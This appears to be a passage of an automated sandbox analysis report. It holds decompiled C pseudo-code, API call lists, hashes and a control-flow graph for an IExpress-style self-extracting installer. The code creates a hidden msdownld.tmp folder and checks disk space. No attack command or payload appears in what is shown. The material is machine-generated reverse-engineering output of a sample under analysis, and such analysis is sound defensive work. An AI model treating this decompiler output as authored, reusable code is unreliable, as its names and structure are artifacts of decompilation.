                                                                                                                                                                                                      																				_t50 = E00A62630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E00A6658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0xa691e4;
                                                                                                                                                                                                      																					E00A61781(0xa691e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E00A65467(0xa691e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E00A62630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E00A6597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E00A65467(0xa691e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0xa691e4;
                                                                                                                                                                                                      											_t70 = E00A62630(0, 0xa691e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0xa691e4;
                                                                                                                                                                                                      												_t71 = E00A65467(0xa691e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E00A6597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xa68b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E00A65467(0xa68b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E00A644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E00A66CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00a655ab
                                                                                                                                                                                                      0x00a655b2
                                                                                                                                                                                                      0x00a655c9
                                                                                                                                                                                                      0x00a655d5
                                                                                                                                                                                                      0x00a655d9
                                                                                                                                                                                                      0x00a65600
                                                                                                                                                                                                      0x00a65605
                                                                                                                                                                                                      0x00a6560a
                                                                                                                                                                                                      0x00a6560c
                                                                                                                                                                                                      0x00a65638
                                                                                                                                                                                                      0x00a65641
                                                                                                                                                                                                      0x00a65643
                                                                                                                                                                                                      0x00a65645
                                                                                                                                                                                                      0x00a65645
                                                                                                                                                                                                      0x00a6564c
                                                                                                                                                                                                      0x00a65652
                                                                                                                                                                                                      0x00a65657
                                                                                                                                                                                                      0x00a65659
                                                                                                                                                                                                      0x00a65696
                                                                                                                                                                                                      0x00a6569c
                                                                                                                                                                                                      0x00a6589f
                                                                                                                                                                                                      0x00a658a7
                                                                                                                                                                                                      0x00a658ac
                                                                                                                                                                                                      0x00a658b3
                                                                                                                                                                                                      0x00a658b5
                                                                                                                                                                                                      0x00a656a2
                                                                                                                                                                                                      0x00a656a2
                                                                                                                                                                                                      0x00a656a8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656ae
                                                                                                                                                                                                      0x00a656ae
                                                                                                                                                                                                      0x00a656b9
                                                                                                                                                                                                      0x00a656bf
                                                                                                                                                                                                      0x00a656c1
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00a65705
                                                                                                                                                                                                      0x00a6570a
                                                                                                                                                                                                      0x00a65711
                                                                                                                                                                                                      0x00a65717
                                                                                                                                                                                                      0x00a65724
                                                                                                                                                                                                      0x00a65726
                                                                                                                                                                                                      0x00a65729
                                                                                                                                                                                                      0x00a65730
                                                                                                                                                                                                      0x00a65737
                                                                                                                                                                                                      0x00a6573d
                                                                                                                                                                                                      0x00a65740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6572b
                                                                                                                                                                                                      0x00a6572b
                                                                                                                                                                                                      0x00a6572e
                                                                                                                                                                                                      0x00a65742
                                                                                                                                                                                                      0x00a65742
                                                                                                                                                                                                      0x00a65745
                                                                                                                                                                                                      0x00a6576b
                                                                                                                                                                                                      0x00a6576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65747
                                                                                                                                                                                                      0x00a65747
                                                                                                                                                                                                      0x00a6574d
                                                                                                                                                                                                      0x00a6574f
                                                                                                                                                                                                      0x00a65771
                                                                                                                                                                                                      0x00a65771
                                                                                                                                                                                                      0x00a65773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65751
                                                                                                                                                                                                      0x00a65751
                                                                                                                                                                                                      0x00a65753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65755
                                                                                                                                                                                                      0x00a6575b
                                                                                                                                                                                                      0x00a65760
                                                                                                                                                                                                      0x00a65762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65764
                                                                                                                                                                                                      0x00a65764
                                                                                                                                                                                                      0x00a65769
                                                                                                                                                                                                      0x00a6577e
                                                                                                                                                                                                      0x00a6577e
                                                                                                                                                                                                      0x00a65781
                                                                                                                                                                                                      0x00a65788
                                                                                                                                                                                                      0x00a6578d
                                                                                                                                                                                                      0x00a6578f
                                                                                                                                                                                                      0x00a657b2
                                                                                                                                                                                                      0x00a657b8
                                                                                                                                                                                                      0x00a657bd
                                                                                                                                                                                                      0x00a657bf
                                                                                                                                                                                                      0x00a657cd
                                                                                                                                                                                                      0x00a657cd
                                                                                                                                                                                                      0x00a657dd
                                                                                                                                                                                                      0x00a657e3
                                                                                                                                                                                                      0x00a657ef
                                                                                                                                                                                                      0x00a657f5
                                                                                                                                                                                                      0x00a657f8
                                                                                                                                                                                                      0x00a6580a
                                                                                                                                                                                                      0x00a6580a
                                                                                                                                                                                                      0x00a657fa
                                                                                                                                                                                                      0x00a65802
                                                                                                                                                                                                      0x00a65802
                                                                                                                                                                                                      0x00a6580d
                                                                                                                                                                                                      0x00a6580f
                                                                                                                                                                                                      0x00a65830
                                                                                                                                                                                                      0x00a65836
                                                                                                                                                                                                      0x00a6583d
                                                                                                                                                                                                      0x00a6584b
                                                                                                                                                                                                      0x00a65851
                                                                                                                                                                                                      0x00a65855
                                                                                                                                                                                                      0x00a6585a
                                                                                                                                                                                                      0x00a6585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6585e
                                                                                                                                                                                                      0x00a65811
                                                                                                                                                                                                      0x00a65817
                                                                                                                                                                                                      0x00a65819
                                                                                                                                                                                                      0x00a6581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6581f
                                                                                                                                                                                                      0x00a65791
                                                                                                                                                                                                      0x00a65797
                                                                                                                                                                                                      0x00a6579c
                                                                                                                                                                                                      0x00a6579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a657a0
                                                                                                                                                                                                      0x00a657a9
                                                                                                                                                                                                      0x00a657ae
                                                                                                                                                                                                      0x00a657b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a657b0
                                                                                                                                                                                                      0x00a6579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65769
                                                                                                                                                                                                      0x00a65762
                                                                                                                                                                                                      0x00a65753
                                                                                                                                                                                                      0x00a6574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65864
                                                                                                                                                                                                      0x00a65717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656c3
                                                                                                                                                                                                      0x00a656c5
                                                                                                                                                                                                      0x00a656c9
                                                                                                                                                                                                      0x00a656ce
                                                                                                                                                                                                      0x00a656d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656d6
                                                                                                                                                                                                      0x00a656d6
                                                                                                                                                                                                      0x00a656d8
                                                                                                                                                                                                      0x00a656dd
                                                                                                                                                                                                      0x00a656df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656e1
                                                                                                                                                                                                      0x00a656e2
                                                                                                                                                                                                      0x00a656e4
                                                                                                                                                                                                      0x00a656e6
                                                                                                                                                                                                      0x00a656eb
                                                                                                                                                                                                      0x00a656ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00a656f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6586c
                                                                                                                                                                                                      0x00a65878
                                                                                                                                                                                                      0x00a6587e
                                                                                                                                                                                                      0x00a65882
                                                                                                                                                                                                      0x00a65883
                                                                                                                                                                                                      0x00a65889
                                                                                                                                                                                                      0x00a6588e
                                                                                                                                                                                                      0x00a6588e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65896
                                                                                                                                                                                                      0x00a656ed
                                                                                                                                                                                                      0x00a656df
                                                                                                                                                                                                      0x00a656d0
                                                                                                                                                                                                      0x00a656c1
                                                                                                                                                                                                      0x00a656a8
                                                                                                                                                                                                      0x00a6565b
                                                                                                                                                                                                      0x00a6565b
                                                                                                                                                                                                      0x00a6565d
                                                                                                                                                                                                      0x00a65669
                                                                                                                                                                                                      0x00a65669
                                                                                                                                                                                                      0x00a6565f
                                                                                                                                                                                                      0x00a6565f
                                                                                                                                                                                                      0x00a65665
                                                                                                                                                                                                      0x00a65667
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65667
                                                                                                                                                                                                      0x00a6566c
                                                                                                                                                                                                      0x00a65673
                                                                                                                                                                                                      0x00a65678
                                                                                                                                                                                                      0x00a6567a
                                                                                                                                                                                                      0x00a6589b
                                                                                                                                                                                                      0x00a6589b
                                                                                                                                                                                                      0x00a65680
                                                                                                                                                                                                      0x00a65685
                                                                                                                                                                                                      0x00a6568c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6568c
                                                                                                                                                                                                      0x00a6567a
                                                                                                                                                                                                      0x00a6560e
                                                                                                                                                                                                      0x00a65613
                                                                                                                                                                                                      0x00a6561a
                                                                                                                                                                                                      0x00a65620
                                                                                                                                                                                                      0x00a65626
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65626
                                                                                                                                                                                                      0x00a655db
                                                                                                                                                                                                      0x00a655e0
                                                                                                                                                                                                      0x00a655e7
                                                                                                                                                                                                      0x00a655f1
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a655f6
                                                                                                                                                                                                      0x00a658b7
                                                                                                                                                                                                      0x00a658c7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A655CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A65638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00A6564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A65620
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A656B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A6571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A65737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A657CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A657EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A65802
                                                                                                                                                                                                        • Part of subcall function 00A62630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A62654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A65830
                                                                                                                                                                                                        • Part of subcall function 00A66517: FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                        • Part of subcall function 00A66517: LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                        • Part of subcall function 00A66517: DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                        • Part of subcall function 00A66517: FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A65878
                                                                                                                                                                                                        • Part of subcall function 00A6597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A659A8
                                                                                                                                                                                                        • Part of subcall function 00A6597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A659AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-3896789798
                                                                                                                                                                                                      • Opcode ID: eb347b8402e76c102c0711489551e2ebd323521e734d8c61d6cd70ee88f76e2b
                                                                                                                                                                                                      • Instruction ID: 59b3d9b9875c164911a654de2267138d9f36d6495aaecf539bd15dff9916b8c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb347b8402e76c102c0711489551e2ebd323521e734d8c61d6cd70ee88f76e2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 498126B1E04A04ABDB20ABB4CD95BEE767D9F61300F0405A5F586E3191EFB48EC2CA51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 324 a6597d-a659b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a659dd-a65a1b GetDiskFreeSpaceA 324->325 326 a659bb-a659d8 call a644b9 call a66285 324->326 328 a65ba1-a65bde memset call a66285 GetLastError FormatMessageA 325->328 329 a65a21-a65a4a MulDiv 325->329 345 a65c05-a65c14 call a66ce0 326->345 337 a65be3-a65bfc call a644b9 SetCurrentDirectoryA 328->337 329->328 331 a65a50-a65a6c GetVolumeInformationA 329->331 334 a65ab5-a65aca SetCurrentDirectoryA 331->334 335 a65a6e-a65ab0 memset call a66285 GetLastError FormatMessageA 331->335 339 a65acc-a65ad1 334->339 335->337 351 a65c02 337->351 343 a65ae2-a65ae4 339->343 344 a65ad3-a65ad8 339->344 349 a65ae6 343->349 350 a65ae7-a65af8 343->350 344->343 347 a65ada-a65ae0 344->347 347->339 347->343 349->350 353 a65af9-a65afb 350->353 354 a65c04 351->354 355 a65b05-a65b08 353->355 356 a65afd-a65b03 353->356 354->345 357 a65b20-a65b27 355->357 358 a65b0a-a65b1b call a644b9 355->358 356->353 356->355 359 a65b52-a65b5b 357->359 360 a65b29-a65b33 357->360 358->351 364 a65b62-a65b6d 359->364 360->359 363 a65b35-a65b50 360->363 363->364 365 a65b76-a65b7d 364->365 366 a65b6f-a65b74 364->366 368 a65b83 365->368 369 a65b7f-a65b81 365->369 367 a65b85 366->367 370 a65b96-a65b9f 367->370 371 a65b87-a65b94 call a6268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E00A6597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0xa69124 = E00A66285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E00A644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
